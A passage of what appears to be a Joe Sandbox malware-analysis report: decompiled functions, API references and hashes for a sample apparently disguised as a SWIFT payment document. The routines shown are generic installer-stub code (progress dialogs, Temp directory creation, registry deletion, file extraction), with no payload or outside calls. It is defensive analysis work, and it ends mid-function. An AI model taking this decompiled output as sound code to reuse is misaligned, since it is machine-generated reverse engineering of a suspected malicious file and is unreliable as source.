CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0
*?|<>/":, xrefs: 00406941

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-826357637
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}

0x0040303d
0x0040303f
0x00403046
0x00403049
0x00403049
0x0040304f
0x00000000
0x0040304f
0x0040305d
0x00000000
0x00403060
0x00403067
0x00403073
0x0040307b
0x004030b9
0x004030c2
0x00000000
0x004030c7
0x00403084
0x00403095
0x00000000
0x004030a3
0x00403084
0x004030cf

APIs

DestroyWindow.USER32(?,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32 ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404f8d
0x00404f9a
0x00404fa0
0x00404fde
0x00404fde
0x00404fed
0x00404ff4
0x00000000
0x00404ff6
0x00404fa2
0x00404fb1
0x00404fb9
0x00404fbc
0x00404fce
0x00404fd4
0x00404fdb
0x00000000
0x00404fdb
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32 ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32 ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32 ref: 00403007

Strings

unpacking data: %d%%, xrefs: 00402FD3, 00402FE3
verifying installer: %d%%, xrefs: 00402FDA

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32 ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				if(CreateDirectoryW(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3936084776
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
